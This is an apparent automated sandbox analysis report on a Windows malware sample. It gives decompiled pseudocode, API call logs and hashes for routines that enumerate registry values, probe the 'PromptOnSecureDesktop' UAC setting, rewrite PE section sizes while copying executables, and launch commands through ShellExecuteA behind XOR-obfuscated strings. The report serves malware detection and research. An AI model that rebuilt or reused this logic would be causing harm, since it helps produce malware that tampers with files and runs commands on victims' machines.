						_t107 = E0040EED1( &_v64, E00402544(0x4122f8,  &E004106A0, 9, 0xe4, 0xc8));
						_t210 = _t208 + 0x1c;
						asm("sbb eax, eax");
						_t109 =  ~_t107 + 1;
						__eflags = _t109;
						_v20 = _t109;
						if(_t109 != 0) {
							L23:
							_v8 = E0040EE95( &_v364, E00402544(0x4122f8,  &E0041069C, 4, 0xe4, 0xc8));
							E0040EE2A(_t167, 0x4122f8, 0, 0x100);
							_t211 = _t210 + 0x28;
							__eflags = _v8;
							if(_v8 == 0) {
								__eflags = _v364 - 0x22;
								if(_v364 == 0x22) {
									E0040EF00( &_v364,  &_v363);
									_t149 = E0040ED23( &_v364, 0x22);
									_t211 = _t211 + 0x10;
									__eflags = _t149;
									if(_t149 != 0) {
										 *_t149 = 0;
									}
								}
								_t196 = E0040EE95( &_v364, E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8));
								E0040EE2A(_t167, 0x4122f8, 0, 0x100);
								__eflags = _t196;
								if(_t196 != 0) {
									_t119 = E0040ED77( &_v364, _a4);
									__eflags = _t119;
									if(_t119 != 0) {
										 *_t196 = 0;
										_t121 = E0040ED23( &_v364, 0x5c);
										_v8 = _t121;
										__eflags = _t121;
										if(_t121 != 0) {
											_t63 =  &_v8;
											 *_t63 =  &(_v8[1]);
											__eflags =  *_t63;
										} else {
											_v8 =  &_v364;
										}
										_t122 = E00406CAD(_v8);
										__eflags = _t122;
										if(_t122 != 0) {
											_pop(_t204);
											_push(0x8b00007e);
											asm("lock xor esi, 0x55555555");
											_v16 = _t204;
											_t166 = _t204 >> 0x00000008 & 0x000000ff;
											_t123 = E00406C96(_t204);
											__eflags = _t123;
											if(_t123 != 0) {
												L57:
												RegCloseKey(_v12);
												__eflags = _a16;
												if(_a16 != 0) {
													E0040EF00(_a16,  &_v64);
												}
												_t125 = 0;
												__eflags = _v20;
												 *_t196 = 0x2e;
												goto L34;
											}
											__eflags = _t166 - 0x40 - 0x3f;
											if(_t166 - 0x40 > 0x3f) {
												goto L57;
											}
											__eflags = (_t204 & 0x000000ff) - 0x10;
											if((_t204 & 0x000000ff) >= 0x10) {
												goto L57;
											}
											_t206 = _a12;
											 *_t196 = 0x2e;
											__eflags = _t206;
											if(_t206 != 0) {
												_t136 = GetFileAttributesExA( &_v364, 0,  &_v400);
												__eflags = _t136;
												if(_t136 != 0) {
													 *_t206 = 1;
												}
											}
											_t130 = _a8;
											__eflags = _t130;
											if(_t130 != 0) {
												 *_t130 = _t166;
											}
											__eflags = _a16;
											if(_a16 != 0) {
												E0040EF00(_a16,  &_v64);
											}
											__eflags = _a20;
											if(_a20 != 0) {
												E0040EF00(_a20, _v8);
											}
											_t125 = 0;
											__eflags = _v20;
											goto L34;
										} else {
											RegCloseKey(_v12);
											__eflags = _a16;
											if(_a16 != 0) {
												E0040EF00(_a16,  &_v64);
											}
											 *_t196 = 0x2e;
											goto L33;
										}
									}
									RegCloseKey(_v12);
									_t96 = 0;
									goto L22;
								} else {
									RegCloseKey(_v12);
									__eflags = _a16;
									if(_a16 != 0) {
										E0040EF00(_a16,  &_v64);
									}
									L33:
									_t125 = 0;
									__eflags = _v20;
									L34:
									_t96 = (_t125 & 0xffffff00 | __eflags == 0x00000000) + 1;
									L22:
									return _t96;
								}
							}
							RegCloseKey(_v12);
							__eflags = _a16;
							if(_a16 != 0) {
								E0040EF00(_a16,  &_v64);
							}
							_t96 = 1;
							goto L22;
						}
						_t155 = E00406CAD( &_v64);
						_pop(_t167);
						__eflags = _t155;
						if(_t155 == 0) {
							L17:
							E0040EE2A(_t167, 0x4122f8, 0, 0x100);
							_t208 = _t210 + 0xc;
							goto L18;
						}
						_t158 = E0040F1A5( &_v64);
						_t167 = _v32 ^ 0x5e5e5e5e;
						__eflags = _t158 - (_v32 ^ 0x5e5e5e5e);
						if(_t158 == (_v32 ^ 0x5e5e5e5e)) {
							goto L23;
						}
						goto L17;
					}
					RegCloseKey(_v12); // executed
					goto L21;
				}
			}

0x00407055
0x00407058
0x0040705a
0x00407061
0x00407068
0x00407071
0x00407073
0x00407073
0x00407075
0x0040707a
0x0040707c
0x0040707c
0x0040707e
0x00407083
0x00407085
0x00407085
0x00407087
0x0040708c
0x0040708e
0x0040708e
0x004070b4
0x004070b9
0x004070c2
0x004070ca
0x004071b8
0x004071c8
0x00000000
0x004070d0
0x004070d0
0x004070d8
0x004070df
0x004070e3
0x004070e4
0x004070e9
0x004070ed
0x004070ee
0x004070f1
0x004070f2
0x004070f5
0x0040719b
0x0040719e
0x004071a9
0x00000000
0x00000000
0x004070fb
0x004070fd
0x0040716e
0x0040716e
0x0040716e
0x0040716e
0x00407174
0x0040717b
0x0040717f
0x00407180
0x00407185
0x00407189
0x0040718a
0x0040718d
0x00407194
0x00000000
0x00407194
0x004070ff
0x00407102
0x00000000
0x00000000
0x00407104
0x00407107
0x00000000
0x00000000
0x00407109
0x0040710d
0x00000000
0x00000000
0x00407123
0x00407128
0x0040712d
0x0040712f
0x0040712f
0x00407130
0x00407133
0x004071d0
0x004071f4
0x004071f7
0x004071fc
0x004071ff
0x00407203
0x00407227
0x0040722e
0x0040723e
0x0040724c
0x00407251
0x00407254
0x00407256
0x00407258
0x00407258
0x00407256
0x00407280
0x00407282
0x0040728a
0x0040728c
0x004072c2
0x004072c9
0x004072cb
0x004072e6
0x004072e8
0x004072ef
0x004072f2
0x004072f4
0x00407301
0x00407301
0x00407301
0x004072f6
0x004072fc
0x004072fc
0x00407307
0x0040730d
0x0040730f
0x00407338
0x00407339
0x0040733e
0x0040734b
0x0040734e
0x00407354
0x0040735b
0x0040735d
0x004073d5
0x004073d8
0x004073de
0x004073e2
0x004073eb
0x004073f1
0x004073f2
0x004073f4
0x004073f7
0x00000000
0x004073f7
0x00407362
0x00407365
0x00000000
0x00000000
0x0040736d
0x00407370
0x00000000
0x00000000
0x00407372
0x00407375
0x0040737a
0x0040737c
0x0040738d
0x00407393
0x00407395
0x00407397
0x00407397
0x00407395
0x0040739d
0x004073a0
0x004073a2
0x004073a4
0x004073a4
0x004073a6
0x004073a9
0x004073b2
0x004073b8
0x004073b9
0x004073bc
0x004073c4
0x004073ca
0x004073cb
0x004073cd
0x00000000
0x00407311
0x00407314
0x0040731a
0x0040731d
0x00407326
0x0040732c
0x0040732d
0x00000000
0x0040732d
0x0040730f
0x004072d0
0x004072d6
0x00000000
0x0040728e
0x00407291
0x00407297
0x0040729a
0x004072a3
0x004072a9
0x004072aa
0x004072aa
0x004072ac
0x004072af
0x004072b2
0x004071cb
0x004071cf
0x004071cf
0x0040728c
0x00407208
0x0040720e
0x00407212
0x0040721b
0x00407221
0x00407224
0x00000000
0x00407224
0x0040713d
0x00407142
0x00407143
0x00407145
0x0040715e
0x00407166
0x0040716b
0x00000000
0x0040716b
0x0040714b
0x00407154
0x0040715a
0x0040715c
0x00000000
0x00000000
0x00000000
0x0040715c
0x004071b2
0x00000000
0x004071b2

APIs

RegOpenKeyExA.KERNELBASE(80000001,00000000,00000101,73B743E0,?,73B743E0,00000000), ref: 004070C2
RegEnumValueA.KERNELBASE(73B743E0,00000000,?,00000020,00000000,00000000,00000000,0000012C), ref: 0040719E
RegCloseKey.KERNELBASE(73B743E0,?,73B743E0,00000000), ref: 004071B2
RegCloseKey.ADVAPI32(73B743E0), ref: 00407208
RegCloseKey.ADVAPI32(73B743E0), ref: 00407291
___ascii_stricmp.LIBCMT ref: 004072C2
RegCloseKey.ADVAPI32(73B743E0), ref: 004072D0
RegCloseKey.ADVAPI32(73B743E0), ref: 00407314
GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040738D
RegCloseKey.ADVAPI32(73B743E0), ref: 004073D8

Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,PromptOnSecureDesktop,000000C8,00407150,?), ref: 0040F1AD

Strings

, xrefs: 00407194
", xrefs: 00407227
PromptOnSecureDesktop, xrefs: 004070AE, 004070B3, 00407118, 00407165, 004071BF, 004071D9, 004071F3, 00407264, 0040727F

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Close$AttributesEnumFileOpenValue___ascii_stricmplstrlen
String ID: $"$PromptOnSecureDesktop
API String ID: 4293430545-98143240
Opcode ID: f7fa99f1004a269bddf57db40b183aae62ae1294250732a5357311ea8bd869c4
Instruction ID: bdd769efad709bd93da993ba4a974553bca105625a5613f565cdc8f40f8c6bf1
Opcode Fuzzy Hash: f7fa99f1004a269bddf57db40b183aae62ae1294250732a5357311ea8bd869c4
Instruction Fuzzy Hash: 8FB17F71D0820ABAEB159FA1DC45BEF77B8AB04304F10047BF501F61D1EB79AA94CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040675C, Relevance: 19.7, APIs: 13, Instructions: 199
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040675C(CHAR* _a4, long* _a8, long _a12) {
				long _v8;
				void* _v12;
				struct _OVERLAPPED* _v16;
				long _v20;
				struct _OVERLAPPED* _v24;
				long _v28;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v60;
				void _v68;
				long _v72;
				void _v132;
				intOrPtr _v320;
				signed int _v360;
				signed int _v374;
				void _v380;
				void* _t85;
				long _t88;
				int _t92;
				long _t93;
				int _t96;
				long _t99;
				long _t102;
				struct _OVERLAPPED* _t103;
				long _t104;
				long _t115;
				long _t120;
				signed int _t143;
				void* _t146;

				_v16 = 0;
				_v8 = 0;
				if(_a12 != 0) {
					SetFileAttributesA(_a4, 0x80);
				}
				_t85 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0); // executed
				_v12 = _t85;
				if(_t85 == 0xffffffff) {
					_v12 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 4, 0);
				}
				if(_a12 != 0) {
					SetFileAttributesA(_a4, 2);
				}
				if(_v12 != 0xffffffff) {
					_t88 = GetFileSize(_v12, 0);
					_v8 = _t88;
					if(_t88 == 0xffffffff || _t88 == 0) {
						L31:
						_v8 = 0;
					} else {
						_a12 = 0;
						_v28 = 0;
						_t92 = ReadFile(_v12,  &_v132, 0x40,  &_a12, 0); // executed
						if(_t92 == 0) {
							goto L31;
						} else {
							_t93 = SetFilePointer(_v12, _v72, 0, 0); // executed
							if(_t93 == 0xffffffff) {
								goto L31;
							} else {
								_t96 = ReadFile(_v12,  &_v380, 0xf8,  &_v28, 0); // executed
								if(_t96 == 0) {
									goto L31;
								} else {
									_t99 = SetFilePointer(_v12, (_v360 & 0x0000ffff) + _v72 + 0x18, 0, 0); // executed
									if(_t99 == 0xffffffff) {
										goto L31;
									} else {
										_v20 = 0;
										_v24 = 0;
										if(0 < _v374) {
											while(1) {
												_t115 = 0x28;
												_a12 = _t115;
												if(ReadFile(_v12,  &_v68, _t115,  &_a12, 0) == 0) {
													break;
												}
												_t143 = _v374 & 0x0000ffff;
												if(_v24 != _t143 - 1) {
													_t120 = _v48 + _v52;
												} else {
													_t120 = (_v320 + _v60 - 0x00000001 &  !(_v320 - 1)) + _v48;
												}
												_a12 = _t120;
												if(_v20 < _t120) {
													_v20 = _t120;
												}
												_v24 = _v24 + 1;
												if(_v24 < _t143) {
													continue;
												} else {
												}
												goto L23;
											}
											_v8 = 0;
										}
										L23:
										if(_v24 >= (_v374 & 0x0000ffff)) {
											_t102 = _v20;
											if(_v8 > _t102) {
												_v8 = _t102;
											}
											_t103 = E0040EBCC(_v8);
											_v16 = _t103;
											if(_t103 == 0) {
												goto L31;
											} else {
												_t104 = SetFilePointer(_v12, 0, 0, 0); // executed
												if(_t104 == 0xffffffff) {
													L30:
													_v8 = 0;
													E0040EC2E(_v16);
													_v16 = 0;
												} else {
													_t146 = _v16;
													if(ReadFile(_v12, _t146, _v8,  &_v20, 0) == 0) {
														goto L30;
													} else {
														 *(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 0x10) =  *((intOrPtr*)(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 8)) + _v320 - 0x00000001 &  !(_v320 - 1);
														_v8 = _v20;
													}
												}
											}
										}
									}
								}
							}
						}
					}
					FindCloseChangeNotification(_v12); // executed
				}
				 *_a8 = _v8;
				return _v16;
			}

0x0040676a
0x0040676d
0x00406778
0x0040677e
0x0040677e
0x0040679a
0x0040679c
0x004067a2
0x004067b2
0x004067b2
0x004067b8
0x004067bf
0x004067bf
0x004067c9
0x004067d3
0x004067d9
0x004067df
0x0040696b
0x0040696b
0x004067ed
0x00406801
0x00406804
0x00406807
0x0040680b
0x00000000
0x00406811
0x0040681f
0x00406824
0x00000000
0x0040682a
0x0040683e
0x00406842
0x00000000
0x00406848
0x0040685c
0x00406861
0x00000000
0x00406867
0x00406869
0x0040686c
0x00406876
0x00406878
0x0040687a
0x00406881
0x0040688f
0x00000000
0x00000000
0x00406891
0x0040689e
0x004068ba
0x004068a0
0x004068b2
0x004068b2
0x004068bd
0x004068c3
0x004068c5
0x004068c5
0x004068c8
0x004068ce
0x00000000
0x00000000
0x004068d0
0x00000000
0x004068ce
0x004068d2
0x004068d2
0x004068d5
0x004068df
0x004068e5
0x004068eb
0x004068ed
0x004068ed
0x004068f3
0x004068f9
0x004068fe
0x00000000
0x00406900
0x00406906
0x0040690b
0x0040695a
0x0040695d
0x00406960
0x00406966
0x0040690d
0x0040690d
0x00406920
0x00000000
0x00406922
0x0040694f
0x00406955
0x00406955
0x00406920
0x0040690b
0x004068fe
0x004068df
0x00406861
0x00406842
0x00406824
0x0040680b
0x00406971
0x00406971
0x0040697f
0x00406986

APIs

SetFileAttributesA.KERNEL32(?,00000080,?,73B743E0,00000000), ref: 0040677E
CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,?,73B743E0,00000000), ref: 0040679A
CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,73B743E0,00000000), ref: 004067B0
SetFileAttributesA.KERNEL32(?,00000002,?,73B743E0,00000000), ref: 004067BF
GetFileSize.KERNEL32(000000FF,00000000,?,73B743E0,00000000), ref: 004067D3
ReadFile.KERNELBASE(000000FF,?,00000040,00408244,00000000,?,73B743E0,00000000), ref: 00406807
SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,73B743E0,00000000), ref: 0040681F
ReadFile.KERNELBASE(000000FF,?,000000F8,?,00000000,?,73B743E0,00000000), ref: 0040683E
SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,73B743E0,00000000), ref: 0040685C
ReadFile.KERNEL32(000000FF,?,00000028,00408244,00000000,?,73B743E0,00000000), ref: 0040688B
SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000000,?,73B743E0,00000000), ref: 00406906
ReadFile.KERNEL32(000000FF,004121A8,00000000,00408244,00000000,?,73B743E0,00000000), ref: 0040691C
FindCloseChangeNotification.KERNELBASE(000000FF,?,73B743E0,00000000), ref: 00406971

Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$Read$Pointer$AttributesCreateHeap$ChangeCloseFindFreeNotificationProcessSize
String ID:
API String ID: 1400801100-0
Opcode ID: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
Instruction ID: 23622665348289c9bdc7ba1e7bdf6275147e3319f3664adf7917ee5564634b96
Opcode Fuzzy Hash: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
Instruction Fuzzy Hash: E47109B1D00219EFDB109FA5CC809EEBBB9FB04314F11457AF516B6290E7349EA2DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0223003C, Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0223024D

Strings

cess, xrefs: 0223018D
kernel32.dll, xrefs: 0223008F, 02230095

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction ID: 86b9cc226d8342aaa261e518690e5eea012925a4716f1a57e1fa8fcbe13a37a1
Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction Fuzzy Hash: 80527DB5A11229DFDB65CF98C984BACBBB1BF09304F1480D9E50DA7355DB30AA85CF24

Uniqueness

Uniqueness Score: -1.00%

Function 004099D2, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54
stringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E004099D2(int __edx, void* __eflags, CHAR* _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16, int _a20) {
				signed int _t14;
				void* _t21;
				CHAR* _t22;
				void* _t24;
				int _t25;

				_t25 = __edx;
				_t22 = _a8;
				lstrcpyA(_t22, _a4);
				E00408274(_t22);
				_push(0);
				_push(_a12);
				_t14 = E00406C6F((E0040ECA5() & 0x0000000f) << 0x00000014 | 0x00005e06);
				_pop(_t24);
				_push(_t14 ^ 0x5e5e5e5e);
				E0040F133();
				lstrcatA(_a12, E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8));
				E0040EE2A(_t24, 0x4122f8, 0, 0x100);
				lstrcatA(_t22, _a12);
				_t21 = E00406A60(_t25, _t22, _a16, _a20); // executed
				return _t21;
			}

0x004099d2
0x004099d6
0x004099df
0x004099e6
0x004099ec
0x004099ee
0x00409a02
0x00409a07
0x00409a0d
0x00409a0e
0x00409a3c
0x00409a46
0x00409a52
0x00409a5b
0x00409a67

APIs

lstrcpyA.KERNEL32(?,?,00000100,PromptOnSecureDesktop,00000000,?,00409E9D,?,00000022,?,?,?,?,?,?,?), ref: 004099DF
lstrcatA.KERNEL32(00000022,00000000,?,?,00409E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 00409A3C
lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,00409E9D,?,00000022,?,?,?), ref: 00409A52

Part of subcall function 00406A60: CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,73BB81D0,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406A7D
Part of subcall function 00406A60: GetDiskFreeSpaceA.KERNELBASE(00409E9D,00409A60,?,?,?,PromptOnSecureDesktop,?,?,?,00409A60,?,?,00409E9D), ref: 00406ABB
Part of subcall function 00406A60: GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B40
Part of subcall function 00406A60: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B4E
Part of subcall function 00406A60: DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B80

Strings

PromptOnSecureDesktop, xrefs: 004099D9, 00409A24, 00409A29, 00409A45

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Filelstrcat$CloseCreateDeleteDiskErrorFreeHandleLastSpacelstrcpy
String ID: PromptOnSecureDesktop
API String ID: 4131120076-2980165447
Opcode ID: 927151ad893000e104c7d64bf47c5e9061fc97ac23e5b39f937f0c9945155e2d
Instruction ID: 999a359fc576e2b3a931277362cd5bccce169ff4f9e5d7c0a577f61a7a1a744c
Opcode Fuzzy Hash: 927151ad893000e104c7d64bf47c5e9061fc97ac23e5b39f937f0c9945155e2d
Instruction Fuzzy Hash: 6601A27294020877EA103F62EC47F9F3F1DEB44718F00483AF619790D2D9BA95709AAC

Uniqueness

Uniqueness Score: -1.00%

Function 00404000, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
sleepfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404000(CHAR* _a4, signed int* _a8) {
				void* _t3;
				long _t6;
				void* _t8;
				signed int* _t9;

				_t9 = _a8;
				_t8 = 0;
				 *_t9 =  *_t9 | 0xffffffff;
				while(1) {
					_t3 = CreateFileA(_a4, 0xc0000000, 3, 0, 3, 0x40000080, 0); // executed
					if(_t3 != 0xffffffff) {
						break;
					}
					_t6 = GetLastError();
					if(_t6 == 2 || _t6 == 3) {
						L6:
						return 0;
					} else {
						if(_t6 == 5) {
							L9:
							return 1;
						}
						Sleep(0x1f4);
						_t8 = _t8 + 1;
						if(_t8 < 0xa) {
							continue;
						}
						goto L6;
					}
				}
				 *_t9 = _t3;
				goto L9;
			}

0x00404001
0x00404006
0x00404008
0x0040400b
0x00404021
0x0040402a
0x00000000
0x00000000
0x0040402c
0x00404035
0x00404052
0x00000000
0x0040403c
0x0040403f
0x00404059
0x00000000
0x0040405b
0x00404046
0x0040404c
0x00404050
0x00000000
0x00000000
0x00000000
0x00404050
0x00404035
0x00404057
0x00000000

APIs

CreateFileA.KERNELBASE(40000080,C0000000,00000003,00000000,00000003,40000080,00000000,00000001,PromptOnSecureDesktop,004042B6,00000000,00000001,PromptOnSecureDesktop,00000000,?,004098FD), ref: 00404021
GetLastError.KERNEL32(?,004098FD,00000001,00000100,PromptOnSecureDesktop,0040A3C7), ref: 0040402C
Sleep.KERNEL32(000001F4,?,004098FD,00000001,00000100,PromptOnSecureDesktop,0040A3C7), ref: 00404046

Strings

PromptOnSecureDesktop, xrefs: 00404000

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateErrorFileLastSleep
String ID: PromptOnSecureDesktop
API String ID: 408151869-2980165447
Opcode ID: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
Instruction ID: 3804347f6bd7ba573f3b83e06e35dce69dd086f5e0a34025cfebbc3953b0dfe0
Opcode Fuzzy Hash: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
Instruction Fuzzy Hash: 05F0A771240101AAD7311B24BC49B5B36A1DBC6734F258B76F3B5F21E0C67458C19B1D

Uniqueness

Uniqueness Score: -1.00%

Function 00406987, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92
fileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00406987(void* __ecx, void* _a4, void* _a8, intOrPtr _a12, signed int _a16) {
				long _v8;
				long _v12;
				signed int _t50;
				int _t52;
				signed int _t53;
				int _t59;
				signed int _t60;
				long _t68;
				signed int _t74;
				void* _t78;
				void* _t85;

				_t78 = _a8;
				_t48 =  *((intOrPtr*)(_t78 + 0x3c)) + _t78;
				_t7 =  &_a16; // 0x406b2c
				_t85 = (( *( *((intOrPtr*)(_t78 + 0x3c)) + _t78 + 6) & 0x0000ffff) - 1) * 0x28 + ( *(_t48 + 0x14) & 0x0000ffff) + _t48 + 0x18;
				_t68 =  *(_t85 + 0x14);
				_t50 =  *_t7 - _t68;
				_v8 = _t50;
				if(_t68 >= _a12) {
					L5:
					_a16 = _a16 & 0x00000000;
				} else {
					_t74 =  *(_t85 + 0x10);
					if(_t74 == 0) {
						goto L5;
					} else {
						_v12 = _t74;
						_a16 = _t50 / _t74;
						if(_a16 < 1) {
							_a16 = 1;
						}
						_t20 =  &_a16; // 0x406b2c
						 *(_t85 + 0x10) =  *_t20 * _t74;
					}
				}
				_v8 = _v8 & 0x00000000;
				_t52 = WriteFile(_a4, _t78, _t68,  &_v8, 0); // executed
				if(_t52 == 0 || _v8 != _t68) {
					if(_a16 != 0) {
						 *(_t85 + 0x10) = _v12;
					}
					_t53 = 0;
				} else {
					if(_a16 == 0) {
						L13:
						_t53 = _t68;
					} else {
						 *(_t85 + 0x10) = _v12;
						while(1) {
							_v8 = _v8 & 0x00000000;
							_t59 = WriteFile(_a4, _a8 +  *(_t85 + 0x14), _v12,  &_v8, 0); // executed
							_t60 = _v8;
							if(_t59 == 0 || _t60 != _v12) {
								break;
							}
							_t68 = _t68 + _t60;
							_t41 =  &_a16;
							 *_t41 = _a16 - 1;
							if( *_t41 != 0) {
								continue;
							} else {
								goto L13;
							}
							goto L18;
						}
						asm("sbb eax, eax");
						_t53 =  !_t60 & _t68 + _t60;
					}
				}
				L18:
				return _t53;
			}

0x0040698f
0x00406995
0x004069a7
0x004069aa
0x004069ac
0x004069af
0x004069b1
0x004069b7
0x004069e0
0x004069e0
0x004069b9
0x004069b9
0x004069be
0x00000000
0x004069c0
0x004069c4
0x004069c7
0x004069d0
0x004069d2
0x004069d2
0x004069d5
0x004069db
0x004069db
0x004069be
0x004069e4
0x004069f9
0x004069fd
0x00406a51
0x00406a56
0x00406a56
0x00406a59
0x00406a04
0x00406a08
0x00406a3c
0x00406a3c
0x00406a0a
0x00406a0d
0x00406a10
0x00406a10
0x00406a27
0x00406a2b
0x00406a2e
0x00000000
0x00000000
0x00406a35
0x00406a37
0x00406a37
0x00406a3a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a3a
0x00406a45
0x00406a49
0x00406a49
0x00406a08
0x00406a5b
0x00406a5f

APIs

WriteFile.KERNELBASE(00409A60,?,?,00000000,00000000,00409A60,?,00000000), ref: 004069F9
WriteFile.KERNELBASE(00409A60,?,00409A60,00000000,00000000), ref: 00406A27

Strings

,k@, xrefs: 004069A7, 004069D5

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileWrite
String ID: ,k@
API String ID: 3934441357-1053005162
Opcode ID: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
Instruction ID: 2e4882fff751b5905bcc38bfa2cd4d67bf9c642b42fdf425c00f27fbfd993b21
Opcode Fuzzy Hash: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
Instruction Fuzzy Hash: 3A313A72A00209EFDB24DF58D984BAA77F4EB44315F12847AE802F7680D374EE64CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004091EB, Relevance: 3.1, APIs: 2, Instructions: 119
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004091EB(char* _a4, char* _a8) {
				signed int _v8;
				signed int _v12;
				char _v524;
				char _t24;
				char* _t25;
				void* _t27;
				intOrPtr* _t29;
				char* _t31;
				char _t34;
				intOrPtr _t40;
				void* _t41;
				char* _t42;
				void* _t44;
				void* _t45;
				void* _t46;

				_v12 = _v12 & 0x00000000;
				_t42 = _a8;
				_v8 = 0x10;
				if( *_t42 == 0) {
					L33:
					return _v12;
				} else {
					goto L1;
				}
				do {
					L1:
					_t31 = E0040ED03(_t42, 0xd);
					if(_t31 != 0) {
						L6:
						_t44 = _t31 - _t42;
						if(_t44 >= 0x200) {
							_t44 = 0x1ff;
						}
						E0040EE08( &_v524, _t42, _t44);
						_t46 = _t46 + 0xc;
						 *((char*)(_t45 + _t44 - 0x208)) = 0;
						if(_v524 == 0) {
							goto L27;
						} else {
							_t25 =  &_v524;
							if(_v524 != 0x20) {
								L16:
								while( *_t25 == 0x22) {
									while(1) {
										_t25 =  &(_t25[1]);
										_t34 =  *_t25;
										if(_t34 == 0) {
											break;
										}
										if(_t34 == 0x22) {
											L15:
											_t25 =  &(_t25[1]);
											goto L16;
										}
									}
									if(_t34 != 0x22) {
										L20:
										while( *_t25 != 0) {
											if( *_t25 == 0x20) {
												L22:
												 *_t25 = 0;
												do {
													_t25 =  &(_t25[1]);
												} while ( *_t25 == 0x20);
												L26:
												_t27 = ShellExecuteA(0, _a4,  &_v524, _t25, 0, 0); // executed
												_v12 = _t27;
												if(_t27 != 0x2a) {
													 *0x412180 = _v8 | 0x5e060100;
													 *0x41217c = _t27;
													return _t27;
												} else {
													goto L27;
												}
												while(1) {
													L27:
													_t24 =  *_t31;
													if(_t24 != 0xd && _t24 != 0xa) {
														goto L30;
													}
													_t31 = _t31 + 1;
												}
												goto L30;
											}
											_t25 =  &(_t25[1]);
										}
										if( *_t25 != 0x20) {
											_t25 = 0;
											goto L26;
										}
										goto L22;
									}
									goto L15;
								}
								goto L20;
							} else {
								goto L10;
							}
							do {
								L10:
								_t25 =  &(_t25[1]);
							} while ( *_t25 == 0x20);
							goto L16;
						}
					}
					_t31 = E0040ED03(_t42, 0xa);
					if(_t31 != 0) {
						goto L6;
					}
					_t29 = _t42;
					_t5 = _t29 + 1; // 0x409689
					_t41 = _t5;
					do {
						_t40 =  *_t29;
						_t29 = _t29 + 1;
					} while (_t40 != 0);
					_t31 = _t29 - _t41 + _t42;
					goto L6;
					L30:
					_t42 = _t31;
					if( *_t31 != 0) {
						Sleep(0x1f4); // executed
					}
					_v8 = _v8 + 1;
				} while ( *_t31 != 0);
				goto L33;
			}

0x004091f4
0x004091fb
0x00409201
0x00409208
0x00409308
0x00000000
0x00000000
0x00000000
0x00000000
0x0040920e
0x0040920e
0x00409216
0x0040921c
